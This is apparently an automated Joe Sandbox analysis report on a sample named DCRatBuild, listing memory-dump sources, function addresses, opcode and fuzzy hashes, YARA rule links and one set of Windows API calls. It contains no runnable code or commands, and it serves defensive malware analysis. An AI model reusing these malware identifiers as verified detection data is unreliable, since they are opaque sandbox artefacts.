                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3192549508-0
                                                                                                                        • Opcode ID: db1ad81870788bc67fe668fa8cfd0c5a9562086d8d7d073d6a14a6f6431aea5c
                                                                                                                        • Instruction ID: 19c0219c32f73064c3083c1eca8e4500b42943a252d66efbf92efeba62ea5d61
                                                                                                                        • Opcode Fuzzy Hash: db1ad81870788bc67fe668fa8cfd0c5a9562086d8d7d073d6a14a6f6431aea5c
                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                        Function 004BC030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 54951025-0
                                                                                                                        • Opcode ID: 626f2c2f750b45215ff14f12bce7fa2adeb7e63a803e1fd2134c121e27a06370
                                                                                                                        • Instruction ID: de8a42a602b2a279e0f0a6b767c118f1cc6792d63042c2b42dd987bbe6961e08
                                                                                                                        • Opcode Fuzzy Hash: 626f2c2f750b45215ff14f12bce7fa2adeb7e63a803e1fd2134c121e27a06370
                                                                                                                        • Instruction Fuzzy Hash: 87A011302022028FA3808F30AF08A0C3AA8AA00282308803AA008C0020EA2080A0AA08
                                                                                                                        Function 004A62CA Relevance: .8, Instructions: 829COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                                                                        • Instruction ID: 6f9504d670f627ba25b7f5d7e8e351462aa8bd47b7b111a369f7b9d8a7023bc6
                                                                                                                        • Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                                                                        • Instruction Fuzzy Hash: B26209716047849FCB15CF28C5906BABBE1BFA6304F0D896ED8DA8B342D738E945CB15
                                                                                                                        Function 004A77EF Relevance: .8, Instructions: 817COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                                                                        • Instruction ID: e0e2a440fa840d4f42260722bd2453c7072bca2dde926dd1b0494b6911e1926d
                                                                                                                        • Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                                                                        • Instruction Fuzzy Hash: 0662FA716083458FCB25DF28C9805BABBE1FFA6304F08856EE8968B346D734E945CB19
                                                                                                                        Function 0049F461 Relevance: .7, Instructions: 694COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                                                                                        • Instruction ID: 35e29da017634015501553d32f1125434b8014a195931414b9f3643b5bf71334
                                                                                                                        • Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                                                                                        • Instruction Fuzzy Hash: 41523972A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                                                                                        Function 004A7153 Relevance: .5, Instructions: 536COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c542c97ae52408e9baf518c868708a9ae87ad9af97b6feaff701a72bf68abfa1
                                                                                                                        • Instruction ID: 2ef1e238300e2dc300ac59aae02c7a366113a1e2a1b2bccb1f3d8832cf6c9fc7
                                                                                                                        • Opcode Fuzzy Hash: c542c97ae52408e9baf518c868708a9ae87ad9af97b6feaff701a72bf68abfa1
                                                                                                                        • Instruction Fuzzy Hash: BA12D6B16087059FC728CF28C990A79B7E0FFA5308F14492EE996C7781D338E555CB49
                                                                                                                        Function 0049C426 Relevance: .5, Instructions: 454COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c326105ee1b3a824189b67e881d2ff89411e3b301f78164018d10eb1eab805a2
                                                                                                                        • Instruction ID: 5653ea65e3cfa2d94d3b80bde5ac8bb4d8c9b40f11ed087729c03a3bbf5373e2
                                                                                                                        • Opcode Fuzzy Hash: c326105ee1b3a824189b67e881d2ff89411e3b301f78164018d10eb1eab805a2
                                                                                                                        • Instruction Fuzzy Hash: 3AF19971A083018FCB18CF29C5C466ABFE5EBCA318F154A3FF48597352D638E9458B5A
                                                                                                                        Function 004A6CDC Relevance: .3, Instructions: 343COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3519838083-0
                                                                                                                        • Opcode ID: cd7b0f1e8b632ec909d4d993615d7e4c7390bcfa3250e759285db26b706eb608
                                                                                                                        • Instruction ID: efb58114514014a4da1f39bc344f576f67ba6fac1074391d06a232a1a46db203
                                                                                                                        • Opcode Fuzzy Hash: cd7b0f1e8b632ec909d4d993615d7e4c7390bcfa3250e759285db26b706eb608
                                                                                                                        • Instruction Fuzzy Hash: B4D1A6716083408FDB24CF29C94475BBBE1BF9A308F09456EF8859B342D778E905CB5A
                                                                                                                        Function 0049E9B7 Relevance: .3, Instructions: 320COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 121ca63fcc093a0b36c69597a409a7a12f6969fcb6ef7f2eb2a314b421e13c9a
                                                                                                                        • Instruction ID: bd6c120c78ec09ec8e8f4f7f8841fb5532979e857c72d525fbf99f68331fd117
                                                                                                                        • Opcode Fuzzy Hash: 121ca63fcc093a0b36c69597a409a7a12f6969fcb6ef7f2eb2a314b421e13c9a
                                                                                                                        • Instruction Fuzzy Hash: B5E15B755093948FC704CF29D89046ABFF0AF9A300F46096FF9C497392C235EA19DB96
                                                                                                                        Function 004A4088 Relevance: .3, Instructions: 270COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                                                                        • Instruction ID: bcabf6b2263d57eb4d4354880634a68981d486cea85a26264c0ff66c3cea0c9f
                                                                                                                        • Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                                                                        • Instruction Fuzzy Hash: 51917AB12003459BDB24EE64D894BFE77C4EBF2308F10092FF99687281DABC9546C35A
                                                                                                                        Function 004A43BF Relevance: .2, Instructions: 243COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                                                        • Instruction ID: 883f6f1b1b3bbb02a5ca7b7d037fea14574d59bbfda882d83646c9cd10823df6
                                                                                                                        • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                                                        • Instruction Fuzzy Hash: 7B8130717043455BDF24DE69C891B7E37D4ABF7308F00493FE68687282DAEC8986875A
                                                                                                                        Function 004B51C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4105a517bb5c634f90eef917f57e86dc481b81f3606ce27070afe67ee91dca73
                                                                                                                        • Instruction ID: d675eeffe267bf85441ca3643b303339bda014aa93792705ff35fc72fdb7f49c
                                                                                                                        • Opcode Fuzzy Hash: 4105a517bb5c634f90eef917f57e86dc481b81f3606ce27070afe67ee91dca73
                                                                                                                        • Instruction Fuzzy Hash: CF616531600F0856DE3CAA6868917FFE3D4AB51344F14196FE982DB381D29EDD438A3E
                                                                                                                        Function 004B4F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                                                        • Instruction ID: b32f45d754360a0ef97906f114118f168a05ee7b1c211d2faa4f68377c2be99f
                                                                                                                        • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                                                        • Instruction Fuzzy Hash: E3513460604F4457DF346A6C8556BFFE3999B52304F18081BE982CB383C61DEE0693BE
                                                                                                                        Function 0049EFE2 Relevance: .2, Instructions: 161COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2171ffc48c8aa202116489af184aec253f0768eaaf71408ffb6542a092862d3a
                                                                                                                        • Instruction ID: 8173bfe628a6dda8b9bdc2f8de9c904fd3406393a38a8ea9e580bf7831ac67d0
                                                                                                                        • Opcode Fuzzy Hash: 2171ffc48c8aa202116489af184aec253f0768eaaf71408ffb6542a092862d3a
                                                                                                                        • Instruction Fuzzy Hash: 1051E7315083D58FDB01CF35C14046EBFE4AE9A318F4909BEE4D99B243D228DA4ECB96
                                                                                                                        Function 004A00B7 Relevance: .1, Instructions: 141COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 034f5682bc3412da5adbee8ce2c495cada77a672136b7a1a1d45f665def041cb
                                                                                                                        • Instruction ID: 1ee515899aa3a4636bacc7db49d87ef24742cfbb908bd539b5245319f250fc13
                                                                                                                        • Opcode Fuzzy Hash: 034f5682bc3412da5adbee8ce2c495cada77a672136b7a1a1d45f665def041cb
                                                                                                                        • Instruction Fuzzy Hash: 6651EFB1A087119FC748CF19D48055AF7E1FF88314F058A2EE899E3340D735EA59CB9A
                                                                                                                        Function 004A3E0B Relevance: .1, Instructions: 112COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                                                        • Instruction ID: 9f8ce82409ea7b8d31475df91e999200b8f3684fdfcaa8222bde4ac76156ef9e
                                                                                                                        • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                                                        • Instruction Fuzzy Hash: 853115B1A147468FCB14EF29C85126BBBE0FBA6305F10452EF495C7341D739EA0ACB96
                                                                                                                        Function 0049E2E8 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 234COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _swprintf.LIBCMT ref: 0049E30E
                                                                                                                          • Part of subcall function 00494092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004940A5
                                                                                                                          • Part of subcall function 004A1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,004D1030,00000200,0049D928,00000000,?,00000050,004D1030), ref: 004A1DC4
                                                                                                                        • _strlen.LIBCMT ref: 0049E32F
                                                                                                                        • SetDlgItemTextW.USER32(?,004CE274,?), ref: 0049E38F
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 0049E3C9
                                                                                                                        • GetClientRect.USER32(?,?), ref: 0049E3D5
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0049E475
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 0049E4A2
                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 0049E4DB
                                                                                                                        • GetSystemMetrics.USER32(00000008), ref: 0049E4E3
                                                                                                                        • GetWindow.USER32(?,00000005), ref: 0049E4EE
                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 0049E51B
                                                                                                                        • GetWindow.USER32(00000000,00000002), ref: 0049E58D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
